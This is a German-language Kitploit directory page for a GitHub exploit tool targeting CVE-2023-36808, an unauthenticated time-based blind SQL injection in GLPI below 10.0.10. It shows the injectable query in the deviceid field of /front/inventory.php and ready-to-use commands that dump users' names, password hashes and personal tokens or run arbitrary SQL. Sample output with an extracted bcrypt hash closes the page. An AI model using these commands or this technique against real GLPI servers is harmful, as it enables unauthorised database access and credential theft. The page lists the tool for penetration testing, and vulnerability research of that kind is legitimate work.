Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-cve-2023-36808 — Zeitbasierter Blind-SQL-Injection-Exploit für CVE-2023-36808 in GLPI < 10.0.10. Extrahiert Benutzeranmeldedaten und Datenbankinhalte über den nicht authentifizierten XML-Inventar-Endpunkt mit Binärsuche-Optimierung. | Kitploit
Tools/GitHubGitHub/fransosiche/exploit-cve-2023-36808
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

Zeitbasierter Blind-SQL-Injection-Exploit für CVE-2023-36808 in GLPI < 10.0.10. Extrahiert Benutzeranmeldedaten und Datenbankinhalte über den nicht authentifizierten XML-Inventar-Endpunkt mit Binärsuche-Optimierung.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-36808 - GLPI SQL-Injection ohne Authentifizierung

Schwachstelle

GLPI-Versionen < 10.0.10 legen einen nicht authentifizierten XML-Inventar-Endpunkt unter /front/inventory.php offen.
Das Feld <deviceid> wird ohne Bereinigung direkt in eine SQL-Abfrage eingefügt:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

Es ist keine Authentifizierung erforderlich. Die Schwachstelle ermöglicht vollständigen Lesezugriff auf die Datenbank über blinde SQL-Injection.

Exploit

Dieses Skript verwendet zeitbasierte blinde Injection mit binärer Suche, um Daten deutlich schneller zu extrahieren als generische Werkzeuge.

  • Ein SLEEP pro boolescher Prüfung (zuverlässig unabhängig von der Tabellengröße)
  • Binäre Suche: ~7 Anfragen pro Zeichen statt 95
  • Parallelität auf Feldebene: Name, Passwort und Token werden pro Benutzer gleichzeitig extrahiert
  • Ein Parallelitätslimit verhindert Timing-Störungen zwischen parallelen Anfragen

Anforderungen

root@kitploit:~
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

Beispielausgabe

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

Referenzen

  • NVD - CVE-2023-36808
  • GLPI Security Advisory
Tool herunterladen